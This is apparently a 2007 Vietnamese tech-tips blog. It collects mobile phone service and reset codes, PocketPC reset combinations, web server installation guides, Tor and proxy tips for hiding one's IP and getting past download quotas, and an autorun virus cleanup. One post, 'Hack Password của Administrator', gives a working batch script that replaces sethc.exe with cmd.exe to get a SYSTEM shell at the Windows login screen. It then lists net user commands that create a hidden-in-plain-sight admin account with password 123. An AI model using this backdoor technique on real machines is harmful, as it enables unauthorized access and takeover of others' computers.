+ 800MHz : mạng IDEN, do Motorla và Nortel phát triển, sử dụng những Cell nhỏ ít thuê bao.

+ 850MHz : Thường dùng ở Bắc Mỹ (Cingular)

+ 900MHz :GSM900, và EGSM900 thương dùng ở châu Á hoặc châu Âu

+ 1800MHz: Mang DCS1800 thường dùng ở châu Á hoặc châu Âu

+ 1900MHz: Mạng PCS1900 thường dùng ở Bắc Mỹ ( T-Mobile)

4 . Cách xem IMEI + Version:

- Xem IMEI:

Bấm * # 06#.,riêng Nokia có IMEI gốc * # 9270 2689 #

- XemVer sion: là phiên bản của phần mềm, phiên bản càng cao thì sửa lỗi càng tốt:

Nokia : * # 0000 #

Sam sung : * # 9999 # (version của máy Samsung là số tự nhiên, càng cuối bảng chữ cái thì version càng cao).

Siemens : * # 06 # Bấm nút trên

Ericsson : * ¯ * ¯ *

Motorola: Từ dòng T 190-191 –198. T2688-2988 Bấm lệnh “ #300# OK

Từ dòng V -> lên dùng thẻ hoặc máy tính
Một số mã lệnh reset… khắc phục lỗi máy di động

Mã lệnh của Samsung:

- Mã lệnh dùng để reset EEPROM máy SamSung, có thể khắc phục được tình trang treo máy, có sóng nhưng không gọi được, trắng màn hình, khóa máy …

* 2767 * 2878 #

* 2767*3855#

*2767*688#

- Mã lệnh chỉnh contrast màn hình như sau:

*#0523# dùng phím để chỉnh , chú ý bỏ sim

- Chỉnh contrast X495: “*#8999*523# hoặc *#8999*8378#”

- Kiểm tra thông số hoạt động của Pin *#9998*228#

- Kiểm tra chế độ rung *#9998*842#

Mã lệnh của NOKIA

- Xem IMEI *#06# hoặc *#92702689#

- Xem phiên bản phần mềm *#0000#

- Reset máy đời thấp *3370#

- Nếu gặp máy Nokia đời cao bị treo máy, hoặc vào các chương trình ứng dụng không được ta có thể dùng lệnh sau “*#7370# hoặc *#7780# , nhập mã code 12345 >ok”, mã số này sẽ khôi phục cài đặt mặc định của nhà sản xuất khi xuất xưởng.

- Hoặc Format máy bằng cách bấm đồng thời 4 nút

“ Power + phím gọi mầu xanh + * + số 3” , giữ vài giây đến khi màn hình hiện Formating thì bỏ tay ra, máy di động sẽ tự format về trạng thái xuất xưởng, chú ý pin phải đầy , cách này rất hiệu quả.

Mã lệnh SonyEricsson

- Format Smartphone ( P800, P900, P910…), dùng phím “Jogdial” là nút cuộn menu phía bên trái, Jogdial UP là cuộn lên, jogdial Down là cuộn xuống.

+ Jogdial UP

+ Bấm phím *

+ Jogdial down

+ Jogdial down

+ Bấm phím *

+ Jogdial down

+ Jogdial down

Lúc đó sẽ hiện lên Menu Format, chọn Format, nhập mã Password 0000

- Dòng máy này có thể xem được ngày sản xuất bằng cách xem ở tem dòng chữ có dạng xxWyy, trong đó xx là năm sản xuất yy là tuần của năm đó, ví dụ máy có dòng chữ 03W06 có nghĩa máy sản xuất vào tuần thứ 6 năm 2003, tức là giữa tháng 2 năm 2003

Mã lệnh Siemens

- Xem Imei *#06#

- Kiểm tra phiên bản phần mềm , bỏ Sim bấm *#06# giữ phím dài bên trái

- Chuyển về tiếng Anh *#0001# bấm nút “SEND”

5 . Các bí mật trên PocketPC

a- Dòng máy Himalaya (O2 Xda II /Qtek 2020 / Orange SPV M1000/ I-Mate PocketPC/ Dopod 696):
- Soft reset: Dùng bút chọc vào lỗ Reset
- Hard Reset: Power + Soft Reset
- Enter Bootloader: DPad(Nút chính giữa) + HardReset

b- Dòng máy Magician (O2 Xda II mini / T-Mobile MDA Compact/ Dopod 818 / I-mate JAM Qtek S100):
- Soft reset: Dùng bút chọc vào lỗ Reset
- Hard Reset: Power + Soft Reset
- Enter Bootloader: Camera + HardReset

c- Dòng máy Blue Angel (O2 Xda IIs/ Dopod 700/ I-mate PDA2k/ T-Mobile MDA III/ SPV M2000/ Qtek 9090):
- Soft reset: Dùng bút chọc vào lỗ Reset
- Hard Reset: Power + Soft Reset
- Enter Bootloader: Record + HardReset

d- Dòng máy Alpine (O2 Xda IIi/Dopod 699 / I-mate PDA2/Qtek 2020i/SPV M2500):
- Soft reset: Dùng bút chọc vào lỗ Reset
- Hard Reset: Power + Soft Reset
- Enter Bootloader: Dpad (Nút chính giữa) + HardReset

e- Dòng máy Universal (O2 Xda Exec / Dopod 900 / Qtek 9000/T-Mobile MDA Pro/ I-mate JASJAR):
- Soft reset: Dùng bút chọc vào lỗ Reset
- Hard Reset: Messages + Calendar + Soft Reset è sau đó ấn phím 0
- Enter Bootloader: Power + Record + Camera + Đèn + Soft Reset

f- Dòng máy Wizard (O2 Xda II mini S/Qtek 9100 / I-mate K-JAM / T-Mobile MDA Vario):
- Soft reset: Dùng bút chọc vào lỗ Reset
- Hard Reset: Comm Manager + Record + Power + Camera + Soft Reset è ấn phím Gọi
- Enter Bootloader: Power + Camera + Soft Reset

6 . Một số lệnh Reset cho LG 3G

LG 8110, 8120 : 277634#*#
LG 8130, 8138 : 47328545454#
LG 8380 : 525252#*#
LG 8360 : *6*41*12##
LG 8180v10A :498 574 654 54#
LG 8180v11A : 492 662 464 663#
LG 8330 : 637664#*#

LG reset
2945#*#
unlock by IMEI 1945#*5101#

LG C3100...... 2945#*5101#
LG B1200...... 1945#*5101#
LG 7020...... 2945#*70001#
LG W510...... 2945#*5101#MENU
LG C1200...... 2945#*1201#

LG 8550 : 885508428679#*#

7 . Mã lệnh Reset mã bảo vệ cho Alcatel

- Alcatel HD1 & HE1: 25228353.
- Alcatel BE1 & BE3: 25228352.
- Alcatel BE4 & BE5: 83227423
- Alcatel BF3 & BF4: 83227423

8 . Lệnh chuyển đổi nhanh ngôn ngữ của máy Nec
*00039# - Italy
*00044# - UK English
*00045# - Denmark
*00046# - Sweden
*00047# - Norway// not av
*00048# - Poland// not av
*00033# - France
*00049# - Germany
*00086# - China

Các máy của máy Sharp 2G (và một số máy 3G)

*01763*278257# Assert Fail Log clear
*01763*2783771#
*01763*2783772#
*01763*2783773#
*01763*2783774#
*01763*2783775#
*01763*3640# disable Engineering Mode
*01763*3641# enable Engineering Mode
*01763*4634# IMEI
*01763*5640# disable LOG
*01763*5641# enable LOG
*01763*6365641#
*01763*6370# disable MEP menue (unlock menue)
*01763*6371# enable MEP menue (unlock menue)
*01763*63866330# disable NetMode
*01763*63866331# enable NetMode
*01763*753371# Sleep Check
*01763*8371# Firmware Version
*01763*8781# Test #1
*01763*8782# Test #2
*01763*8783# Test #3
*01763*8784# Test #4
*01763*8785# Test #5
*01763*8786# Test #6
*01763*8787# Test #7
*01763*87870# Test #70
*01763*87871# Test #71
*01763*87872# Test #72
*01763*87873# Test #73
*01763*87874# Test #74
*01763*8788# Test #8
*01763*87891#
*01763*87892#

Hack Password của Administrator trong Windows XP

2007-09-19T19:02:00.000-07:00

Hiện nay không có quá nhiều cách để phục hồi mật khẩu của tài khoản Administrator trong Windows bị quên mất. Có thể kể đến là dùng công cụ hỗ trợ của đĩa Hiren Boot để xóa trắng mật khẩu của tài khoản Administrator hay dùng các công cụ dò tìm mật khẩu trên Net. Tuy vậy, không phải lúc nào chúng ta cũng có công cụ để dùng. Nếu gặp những lúc như thế.... hãy lợi dụng lỗ hỏng của file sethc.exe trên Windows.

Giải thích thủ thuật này (cho các chuyên gia... thích suy nghĩ)Trên Windows XP, nếu bạn nhấp phím Shift 5 lần, Windows sẽ gọi một chương trình nhỏ có tên là StickyKey. Đây là chương trình hỗ trợ người khuyết tật khi sử dụng Windows XP được đính kèm mặc đinh trong bộ tiện ích của Windows. Điều này có nghĩa là bạn có thể gọi chương trình này bằng phím tắt mà không cần đến giao diện thân thiện (1).Nếu bạn đăng nhập bằng tài khoản có tên User1 và nhấp phím Shift 5 lần để gọi chương trình này, Windows sẽ lấy quyền của User1 để gọi chương trình StickyKey. Nếu bạn không đăng nhập vào bất kỳ một tài khoản nào mà gọi được StickyKey thì Widnows sẽ lấy quyên của hệ thống (System) để chạy StickyKey (2).Từ giả định (1) và (2) trên, nếu bạn thay thế file thực thi của chương trình StickyKey (sethc.exe) bằng chương trình Command Run (cmd.exe) và gọi nó bằng 5 lần phím Shift mà không đăng nhập bằng tài khoản nào cả thì windows sẽ dùng quyền của Hệ thống (system) gọi file cmd.exe thay vì file sethc.exe. Thế là có thể làm bất cứ chuyện gì bằng tài khoản của cao nhất (quyền của Hệ thống) trên chương trình Command Run.

Cách thực hiện thủ thuật này:

Bước 1: Vào windows với tài khoản User bình thường và nhấn 5 lần phím Shift để gọi thử chương trình StickyKey trên Windows và đóng nó lại (chỉ nhằm để xem thử).

Bước 2: Vào Start >> Run >> nhập vào Notepad và Enter để gọi chương trình Notepad.exe. Copy đoạn mã của mình viết, past vào notepad, Save lại với tên là Hackpass.bat

REM Visit www.helloICT.com to learn more tips and tricks

REM Ghe tham trang web www.helloict.com de doc nhieu thu thuat hay

REM ---------------------------------------------------------------

REM Coded by THC

cd %systemroot%/system32

rename sethc.exe sethc.exe.bk

copy cmd.exe sethc.exe /y

Sau đó nhấp kép chuột lên file Hackpass.bat để thực thi!

Đoạn mã này làm các nhiệm vụ sau:

1. Sao lưu lại file sethc.exe bằng cách đặt lại tên là sethc.exe.bk

2. Thay thế file sethc.exe bằng file cmd.exe

Đến đây, bạn nhấp phím Shift 5 lần, nếu chương trình Command Run được gọi thay vì chương trình StickyKey thì bạn đã thành công!

Chương trình StickyKey đã được thay bằng Ccmmand Run

Bước 3: Khởi động lại máy. Khi đến màn hình đăng nhập, bạn khoan hãy đăng nhập mà nhấn phím Shift 5 lần...... Lúc này chương trình Command Run xuất hiện, bạn nhập một trong những vào đoạn lệnh dưới đây

Xóa trắng password của Administrator:
net user Administrator
---- > nhấn phím Enter khi hoàn thành!

Thêm một tài khoản Admin với mật khẩu là 123
net user Admin 123 /add
---- > nhấn phím Enter khi hoàn thành!

Gán tài khoản Admin vào nhóm quản trị:
net localgroup Administrators Admin /add
---- > nhấn phím Enter khi hoàn thành!

Nếu bạn sử dụng đúng cấu trúc lệnh phía trên, bạn sẽ tạo được các tài khoản mới. Tại đây, bạn có thể đăng nhập vào các tài khoản mới mà không cần khởi động lại máy!

Cách Hide IP thong qua Fire Fox

2007-07-22T05:44:00.000-07:00

Hôm nay tôi sẽ hướng dẫn các bạn một cách fake IP rất tốt và tiện lợi với TOR và FoxyProxy sử dụng kèm trình duyệt FireFox. Với cách fake IP này, bạn không bao giờ sợ bị lộ địa chỉ IP thật, bạn có thể thay đổi địa chỉ IP dễ dàng (một việc làm rất nhọc nhằn nếu sử dụng proxy thông thường), và tốc độ sau khi fake IP khá hơn nhiều so với sử dụng proxy, theo nhận định của tôi.

Đầu tiên, nếu bạn chưa sử dụng Mozilla FireFox, hãy download và cài đặt nó ngay hôm nay. Đây là trình duyệt tốt nhất thế giới với những tính năng ưu việt mà không một trình duyệt nào khác sánh kịp. Ngoài ra nó còn có một hệ thống “extensions” (các công cụ bổ trợ) rất phong phú có thể đáp ứng mọi nhu cầu của bạn.

- Cài đặt FireFox:
Download: http://www.mozilla.com/firefox/
Cài đặt theo hướng dẫn của nhà sản xuất.

Sau khi cài đặt FireFox, bạn cần cài đặt TOR và FoxyProxy.

- Cài đặt TOR:
Download: http://tor.eff.org/
Chọn download gói đầu tiên trong danh sách (bao gồm các phần mềm TOR, Privoxy và Vidalia dành cho Window$). Cài đặt gói này theo mặc định (bạn có thể bỏ bớt Privoxy cũng được). Sau khi chương trình được khởi động, bạn sẽ thấy một icon mới xuất hiện trên khay hệ thống có hình củ hành bị gạch chéo màu đỏ. Nhấp chuột phải vào biểu tượng này, chọn “Start”, củ hành sẽ biến thành màu xanh lá. TOR đã chạy trên máy tính của bạn.

Không giống các chương trình fake IP khác sử dụng các proxy cố định, TOR là một mạng riêng bao gồm một loạt các server tình nguyện được đặt khắp nơi trên thế giới. Đặc điểm của mạng TOR là mỗi nút trong mạng chỉ “biết” những nút liền kề với mình, và đường đi của dữ liệu trong mạng được thay đổi liên tục, do vậy một khi đã đi qua mạng TOR, không ai có thể truy ra địa chỉ IP thật của bạn.

Nếu bạn có một đường truyền Internet mạnh và muốn tình nguyện “chia tải” cho mạng TOR, hãy nhấp chuột phải vào biểu tượng củ hành và chọn Configure -> Server, đánh dấu “Relay trafic for the TOR network”. Nếu không, bạn chỉ cần chọn “Start” và chờ củ hành biến thành màu xanh lá là đã có thể sử dụng mạng TOR.

Bây giờ, khi TOR đã chạy ổn định, bạn cần cài đặt công cụ bổ trợ FoxyProxy.
- Cài đặt FoxyProxy:
Download: https://addons.mozilla.org/firefox/2464/

Sau khi cài đặt, bạn restart FireFox, FoxyProxy sẽ lần lượt hỏi bạn:
1. “Có sử dụng mạng TOR hay không?” Trả lời: “Yes.”
2. “Sử dụng TOR với Privoxy không?” Trả lời: “Without.”
3. “Có định tuyến yêu cầu DNS qua mạng TOR không?” Trả lời: “Yes.”
Thế là xong. Bây giờ, trong FireFox, bạn chọn Menu Tools -> Extensions -> FoxyProxy -> Options. Chọn Mode “Use proxies based on their pre-defined patterns and priorities,” chọn “TOR” trong danh sách, nhấp Edit Selection -> Patterns ->Add New Pattern và thêm vào những địa chỉ trang web mà bạn muốn sử dụng với mạng TOR. Ví dụ, bạn muốn fake IP khi download từ hệ thống RapidShare, hãy bổ sung pattern “*rapidshare*”. Hoặc bạn muốn fake IP khi đăng ký các trang web sử dụng hệ thống billing CCBill, hãy thêm vào pattern “*ccbill*”, v.v…

Tất cả đã sẵn sàng, bây giờ bạn có thể duyệt Web thoải mái như bình thường. Đối với các địa chỉ Web bình thường (ví dụ www.yahoo.com), FireFox vẫn sử dụng kết nối trực tiếp để đảm bảo tốc độ tối đa cho bạn, trong khi với các địa chỉ Web “đặc biệt” đã được bạn lên danh sách, FireFox sẽ chuyển request của bạn qua mạng TOR để fake IP. Nếu bạn muốn thay đổi địa chỉ IP (ví dụ khi download từ MegaUpload mà bị “exceed limit”), bạn chỉ việc tắt chương trình TOR đi rồi bật lại, TOR sẽ thiết lập một mạng mới hoàn toàn và do đó, địa chỉ IP của bạn cũng sẽ được đổi.

Để cho chắc chắn, thỉnh thoảng bạn nên thử địa chỉ IP của mình với site: http://www.stayinvisible.com/cgi-bin/iptest.cgi
Nhớ là phải add địa chỉ site này vào pattern TOR nếu bạn muốn biết mình đang sử dụng IP nào trong mạng TOR.

Chúc thành công.

PS: Một số bạn gặp khó khăn khi add pattern. Nếu thấy rắc rối quá, bạn có thể làm thế này cho tiện: Mở Options của FoxyProxy, chọn "Mode: Use proxy TOR for All URLs". Khi đó bạn vào bất cứ trang web nào đều phải qua mạng TOR. Khi không cần fake IP nữa (chẳng hạn như cần download), bạn tắt hẳn FoxyProxy bằng cách chọn "Mode: Completele Disable FoxyProxy," khi đó bạn sẽ sử dụng IP thật bình thường.

PS2: Các trình duyệt khác cũng có thể sử dụng mạng TOR chứ không phải chỉ có FireFox như tôi tưởng. (Ngốc ơi là ngốc ) Mạng TOR hoạt động như một Sock proxy level 5. Chỉ cần trình duyệt của bạn cho phép thiết lập Sock 5, bạn hãy gõ vào địa chỉ IP của localhost (127.0.0.1) và cổng mà bạn chọn cho TOR chạy (default là 9050). Dùng các trình duyệt khác dĩ nhiên không cần FoxyProxy.
Nhưng dù sao tôi vẫn khoái FireFox

+ CÀI ĐẶT MICROSOFT INSTALLER

2007-07-06T00:08:00.003-07:00

Download và Cài đặt Microsoft InstallerNếu bạn dùng Win9x hoặc WinNT 4 thì bạn cần phải download và cài Microsoft Installer trước khi tiếp tụ cài đặt các phần khác. Microsoft Installer dùng để cài đặt các file có phần mở rộng là .msi.
Bạn có thể download Microsoft Installer ở đây: Win9x (1.45Mb), WinNT4 (1.46Mb).
Sau khi download phiên bản Microsoft Installer tương ứng với Windows mà bạn đang dùng, sau đó install vào máy của bạn và khởi động lại máy trước khi tiếp tục

+ CÀI ĐẶT PERL

2007-07-06T00:08:00.001-07:00

Download ActivePerlBạn có thể download ActivePerl ở địa chỉ http://downloads.activestate.com/ActivePerl/Windows/5.6/ActivePerl-5.6.1.630-MSWin32-x86.msi (hoặc tìm và download ở www.download.com).
Cài đặt ActivePerlCác bước chi tiết cài đặt Apache được minh hoạ như sau (tôi dùng Win98SE và ActivePerl 5.6.0.616)
Bước 1: Sau khi download ActivePerl, bạn double click lên file .msi vừa download, một hộp thoại sẽ hiện ra như hình bên. Bạn click vào nút Next để sang bước 2.
Bước 2: Bạn chọn phần "I accept the terms in the license agreement" và nhấn Next để sang bước 3.
Bước 3: Bạn chọn thư mục để cài Active (nhấn nút Change), mặc định là C:\Perl. Nhấn Next, rồi Next 1 lần nữa để bắt đầu cài đặt Apache.
Bước 4: ActivePerl sẽ bắt đầu cài đặt các file vào đĩa cứng của bạn. Bạn chỉ có việc là...ngồi chờ.
Bước 5: Sau khi ActivePerl đã cài đặt xong, nhấn Finish để kết thúc.
Chạy thử Perl với ApacheBạn tạo 2 file hello.cgi và hello.pl trong thư mục c:\www\cgi-bin với nội dung như sau:
#!c:\perl\bin\perl.exeprint "Content-type: text/html\n\n";print "Hello, world!";
Chú ý là nếu bạn đã đặt thư mục C:\perl\bin vào trong PATH thì dòng đầu tiên bạn chỉ cần ghi là #!perl thay vì #!c:\perl\bin\perl.exe.
Tiếp theo bạn mở IE và thử truy cập vào địa chỉ http://localhost/cgi-bin/hello.cgi và http://localhost/cgi-bin/hello.pl. Nếu bạn nhận được dòng chữ Hello, world! thì XIN CHÚC MỪNG! Bạn đã cài đặt thành công Perl rồi đó!

+ CÀI ĐẶT MYSQL

2007-07-06T00:07:00.003-07:00

Download mySQLBạn có thể download mySQL for Windows tại địa chỉ: http://www.mysql.com/downloads/index.html. Phiên bản hiện tại vào thời điểm bài tutorial này được viết là version 3.23, bạn có thể download trực tiếp tại đây: http://www.mysql.com/Downloads/MySQL-3.23/mysql-3.23.46-win.zip (12Mb).
Cài đặt mySQLCác bước chi tiết cài đặt mySQL được minh hoạ như sau (tôi dùng Win98SE và mySQL 3.23.42 for Windows)
Bước 1: Sau khi download mySQL, unzip các file vài một thư mục nào đó và chạy file setup.exe để bắt đầu cài đặt (xem hình bên). Bạn nhấn Next hai lần để sang bước 2.
Bước 2: Bạn chọn thư mục để cài đặt mySQL, mặc định là C:\mysql. Nhấn Next để sang bước tiếp theo.
Bước 3: Bạn chọn phần Custom và nhấn Next để sang bước tiếp theo.
Bước 4: Bạn nhấn Next để sang bước tiếp theo, và tiếp tục nhấn Next để bắt đầu cài đặt mySQL.
Bước 5: Sau khi mySQL đã cài đặt xong, bạn hãy chạy file winmysqladmin.exe trong thư mục C:\mysql\bin. Nếu là lần đầu tiên bạn chạy file này sau khi cài đặt, một hộp thoại sẽ hiện lên hỏi username và password của của người quản lý mySQL. Bạn nhập vào username và mật mã tuỳ bạn chọn (tôi chọn username là root và mật mã là password).
Sau bước này, một icon hình đèn giao thông sẽ xuất hiện trên system tray của bạn. Nếu đèn hiệu đang ở màu xanh thì xem như mọi chuyện đã êm đẹp.
Cài đặt phpMyAdminphpMyAdmin là một chương trình mySQL Client rất mạnh được viết bằng PHP. Bạn có thể dùng phpMyAdmin để truy cập vào database quản lý mySQL từ browser.
Bạn có thể download phpMySQL ở đây: http://sourceforge.net/project/showfiles.php?group_id=23067&release_id=63838Nếu đang dùng Windows, bạn có thể download file zip phiên bản mới nhất 2.2.2 của phpMyAdmin tại đây: http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.2.2-php.zip
Sau khi download, bạn unzip các file vào thư mục c:\www\phpmyadmin. Sau đó bạn mở file config.inc.php, tìm sửa các dòng sau.
tìm dòng bắt đầu bằng $cfgServers[1]['host'], sửa thành $cfgServers[1]['host'] = 'localhost'; (connect vào localhost)
tìm dòng bắt đầu bằng $cfgServers[1]['user'], sửa lại thành $cfgServers[1]['user'] = 'root'; (root là username mà bạn đã tạo ở trên)
tìm dòng bắt đầu bằng $cfgServers[1]['password'], sửa lại thành $cfgServers[1]['password'] = 'password'; (password là mật mã bạn đã tạo ở trên)
Lưu lại file config.inc.php, mở IE và truy cập vào địa chỉ http://localhost/phpmyadmin/index.php. Nếu bạn nhận được màn hình chào đón của phpMyAdmin thì XIN CHÚC MỪNG! Bạn đã thành công!

+ CÀI ĐẶT PHP

2007-07-06T00:07:00.001-07:00

Download PHPBạn có thể download PHP for Windows tại địa chỉ: http://www.php.net/downloads.php.
- Nếu đường truyền bạn chậm thì bạn có thể download phần PHP 4.0.6 installer (755Kb): chỉ có PHP-CGI- Còn nếu muốn bạn có thể download trọn gói PHP về PHP 4.0.6 zip package (4.7Mb): PHP-CGI và PHP-Module
Cài đặt PHPCác bước chi tiết cài đặt PHP được minh hoạ như sau (tôi dùng Win98SE và PHP 4.0.6 for Windows)
Bước 1: Sau khi download PHP, bạn double click lên file .exe vừa download, một hộp thoại sẽ hiện ra như hình bên. Bạn click vào nút Next, rồi nhấn I Agree để sang bước 2.
Bước 2: Bạn chọn phần Advanced và nhấn Next để sang bước tiếp theo.
Bước 3,4,5: Bạn chọn thư mục để cài PHP, File upload và Session data, mặc định lần lượt sẽ là C:\PHP, C:\PHP\uploadtemp và C:\PHP\sessiondata.
Bước 6: Bạn điền địa chỉ SMTP và email của admin. Nếu chạy trên máy local bạn đặt là localhost và admin@localhost. Nhấn Next để sang bước tiếp theo.
Bước 7: Bạn chọn phần đầu tiên: Display all errors warnings and notices và nhấn Next để sang bước tiếp theo.
Bước 8: Bạn chọn kiểu web server thích hợp (ở đây là Apache) và nhấn Next, rồi lại Next một lần nữa để bắt đầu cài đặt.
Bước 9: Bạn chỉ có việc ngồi chờ trong khi chương trình cài đặt copy các file lên đĩa cứng của bạn.
Lưu ý: Sau khi copy file xong, rất có thể PHP sẽ báo là không thể update được file httd.conf của Apache. Bạn đừng lo lắng, hãy nhấn OK để tiếp tục, chúng ta sẽ cấu hình Apache sau.
Bước 10: Sau khi PHP đã cài đặt xong, bạn nhớ khởi động lại máy trước khi tiếp tục.
Cấu hình Apache để chạy PHPBạn hãy mở file httpd.conf của Apache ra (bạn còn nhớ file đó nằm đâu chứ? nếu quên bạn hãy xem lại phần Cài đặt Apache) và thêm vào 3 dòng sau:ScriptAlias /php/ "c:/php/"AddType application/x-httpd-php .phpAction application/x-httpd-php "/php/php.exe"
Tiếp theo bạn tìm đến dòng bắt đầu bằng DirectoryIndex, bạn sẽ thấy dòng đó có dạng như sau:DirectoryIndex index.htmlDòng đó cho bạn biết rằng file index.html được xem như là file index mặc định của một thư mục. Bạn sửa lại dòng đó như sau:DirectoryIndex index.html index.htm index.cgi index.php
Lưu file httpd.conf và khởi động lại Apache.
Chạy thử PHP với ApacheBạn tạo 1 file hello.php trong thư mục C:\www với nội dung như sau:
Tiếp theo bạn mở IE và truy cập vào địa chỉ http://localhost/hello.php. Nếu bạn nhận được dòng chữ Hello, world! thì XIN CHÚC MỪNG! Bạn đã cài đặt thành công PHP rồi đó!

+ CÀI ĐẶT APACHE WEB SERVER

2007-07-06T00:06:00.001-07:00

Download Apache Web ServerBạn có thể download Apache Web Server ở http://www.apache.org/dist/httpd/binaries/win32/. Bạn chú ý chọn phiên bản thích hợp với hệ điều hành mà bạn đang dùng.
- Apache 1.3.20 for Win: http://www.apache.org/dist/httpd/binaries/win32/apache_1.3.20-win32-no_src-r2.msi- Apache 1.3.22 for Win: http://www.apache.org/dist/httpd/binaries/win32/apache_1.3.22-win32-x86.msi
Cài đặt ApacheCác bước chi tiết cài đặt Apache được minh hoạ như sau (tôi dùng Win98SE và Apache 1.3.20)
Bước 1: Sau khi download Apache, bạn double click lên file .msi vừa download, một hộp thoại sẽ hiện ra như hình bên. Bạn click vào nút Next để sang bước 2.
Bước 2: Bạn chọn phần "I accept the terms in the license agreement" và nhấn Next, tiếp tục nhấn Next một lần nữa để sang bước 3.
Bước 3: bạn điền localhost vào phần Networl Domain và Server Name, điền admin@localhost vào phần Aministrator's Email Address. Click Next để sang bước tiếp theo.
Bước 4: Bạn chọn Custom và nhấn Next để tiếp tục.
Bước 5: Bạn chọn thư mục để cài Apache (nhấn nút Change), mặc định là C:\Program Files\Apache Group. Nhấn Next, rồi nhấn Next lần nữa để sang bước 6.
Bước 6: Apache sẽ bắt đầu cài đặt các file vào đĩa cứng của bạn. Bạn chỉ có việc là...ngồi chờ.
Bước 7: Sau khi Apache đã cài đặt xong, bạn khởi động lại máy trước khi tiếp tục.
Chạy thử Apache: Sau khi khởi động, bạn chạy Apache từ Star Menu: Sau đó bạn khởi động IE và truy cập vào địa chỉ http://localhost, nếu bạn nhận được màn hình đón chào của Apache thì có nghĩa là bạn đã cài đặt t hành công Apache.
Cấu hình ApacheMặc định Apache sẽ đặt trang web của bạn ở C:\Program Files\Apache Group\htdocs, tuy nhiên bạn có thể cấu hình để sử dụng thư mục khác (tôi dùng thư mục C:\www).
Trước tiên bạn tạo thư mục www trong đĩa C: và tạo thêm thư mục cgi-bin ở trong thư mục www vừa tạo.Tiếp theo, bạn mở file C:\Program Files\Apache Group\conf\httpd.conf bằng một chương trình text editor nào đó.Bạn tìm đến dòng bắt đầu bằng DocumentRoot và sửa lại giá trị của DocumentRoot từ C:\Program Files\Apache Group\htdocs thành C:\www, và tìm sửa dòng thành .Tiếp them bạn tìm dòng bắt đầu bằng ScriptAlias /cgi-bin/ và sửa lại giá trị của cgi-bin từ C:/Program Files/Apache Group/htdocs/cgi-bin thành c:/www/cgi-bin.Và cuối cùng bạn tìm dòng và sửa lại thành . Bạn sẽ đặt các file Perl-CGI của bạn ở trong thư mục này.Lưu file httpd.conf, thoát và khởi động lại Apache.

Các Ebook hay đây và các Tool kèm theo

2007-07-05T19:34:00.000-07:00

KỸ THUẬT PHẦN CỨNG

http://www.4shared.com/file/19295812/86c8f5a5/KTPC.html

CÀI ĐẶT MẠNG BOOT ROM
http://www.4shared.com/file/19295878/3047bb3d/HuongdancaidatBootRoom.html

CÀI ĐẶT WIN2K SERVER
http://www.4shared.com/file/19295865/57edf6c1/Cai_dat_Win2k_Server.html

HỆ THỐNG PHÁT TRIỂN XÂM NHẬP
http://www.4shared.com/file/19295600/7b4388c2/He_Thong_Phat_Hien_Xam_Nhap.html

BẢO VỆ HOSTING SERVER
http://www.4shared.com/file/19295503/e00c6721/baovehosting_server.html
http://www.4shared.com/file/19295515/1074f355/baovehosting_server.html

Các cách download tại Megaupload

2007-07-04T23:06:00.000-07:00

Cách 2 :

- Down software Universal share downloader tại trang : http://www.dimonius.ru/dusd.php

- Down software Rapget tại trang :
http://www.rapget.com/en/download.html

2 cái này cũng như những trình download bịnh thường khác. Nhưng nó hỗ trợ get link trực tiếp từ Megaupload

Cách 3 :

Như các bạn đã biết trước đây các bạn đã từng dùng 1 link gián tiếp để down các link của Mega đó là trang
www.anonymouse.org/anonwww.html
nhưng trang đó bây giờ cũng ko còn tác dụng nữa, bây giờ thì chúng ta có thể dùng 1 trang khác khá hay so với trang trên đó là trang
www.whereismyproxy.com/easyweb/

( Update 4/7/06 : trang http://www.whereismyproxy.com/easyweb có vẻ bị down rồi. Thành thật xin lỗi, nhưng các bạn cũng có thể tìm proxy tại http://www.whereismyproxy.com )

Cách hỗ trợ để down liên tục ko bị bandwidth :

Dùng chương trình Hide Platinum dùng để đảm bảo an toàn khi lướt mạng, có nghĩa là nó sẽ giấu IP cùa máy tình khi bạn lướt mạng.
Ví dụ khi bạn download bằng Mega chỉ cho 1Gb download trong một ngày bạn nào download nhiều sẽ ko được --->> thì bạn hãy dùng Hide Platinum này để thay đổi IP và bạn có thể download thoải mái.Nhớ tắt trương trình download di sau đó bạn thay đồi lại IP rồi download tiếp hoặc khởi đông lại máy nếu ko download duoc tiếp. Download về nhớ install, Nhưng mà nhiều khi dùng cái này nó, làm hơi chậm khi lướt mạng.
( Có thể dùng cách này down trực tiếp, ko cần 3 cách trên )

Link download : http://www.megaupload.com/de/?d=JWXL4A2M

Hiện giờ mình đang nghiên cứu cách thứ 4 & 5. Nếu thành công thì sẽ nhờ mod update. Các bạn chờ nha.

Nếu xài 3 cách này mà còn down ko dc. thì kêu admin lock nick mình đi ( trừ khi cái file nó die rồi thì mới down ko dc. thui )

Updated ( 1h15' am 6/7/06 ) Cách 4 & 5 :

Cách 5 :

Cách này thì ai cũng biết, đó là xài Alexa Toolbar.

Down Alexa Toolbar tại : http://www.download.alexa.com

Lúc này khi muốn down tại mega thì để cho Alexa Toolbar hiển thị, nếu nó ko hiển thị thì vào View - Toolbars - Alexa

( Thật ra cách này là cách dỏm nhất, mọi người có thấy vậy ko Lâu lâu thì có 1 vài file làm dc. chứ bình thường chỉ là thứ " cùi bắp ". Nhưng thôi cứ đưa nó vào Mega download Collection vậy ^^ )

Recommended :
Các bạn nên sử dụng FireFox, vì Megaupload quá phổ biến nên chuyện có Spyware hay Virus trên đây là hoàn toàn có thể. FF bảo mật tốt hơn IE, lại hỗ trợ down, rất thích hợp cho việc download tại Megaupload.

Down FireFox tại : http://www.getfirefox.com

--------------------------------------------------------------------------------

http://rapid-hook.com/ ----> add rapidshare.com link

http://www.rapidhack.net/ ----> add rapidshare.de link.

Diệt Virus Autoplay

2007-06-25T20:51:00.000-07:00

Các bước thực hiện:
1. Open My computer
2. chọn menu Tools -> chọn Folder options.
2. chọn Tab view.
3. bạn thấy biểu tượng Folder "Hidden files and folder"
4. check vào "Show Hidden files and folder"
5 . bạn thấy phía dưới nó có 2 ô là " Hide extensions for know và Hide protect operating system (recom)
bỏ dấu check trong 2 ô đó đi ( disable )
6. press Apply
7. press ok.
8. click chuột phải lên Taskbar
9. click Task Manager
10. chọn Table Processes
11. tìm wscript.exe và click vào nó
12. click vào End Process
13. open drive
14. không double click.
15. dùng chuột phải
16. delete file autorun.inf and ms32dll.dll.vbs
17. right click at explore
18. then delete file.
19. after, right click at explore
20. delete autorun.inf and ms32dll.dll.vbs bằng tổ hợp phím Shift+Delete
21. all drive in my com .
22. after that
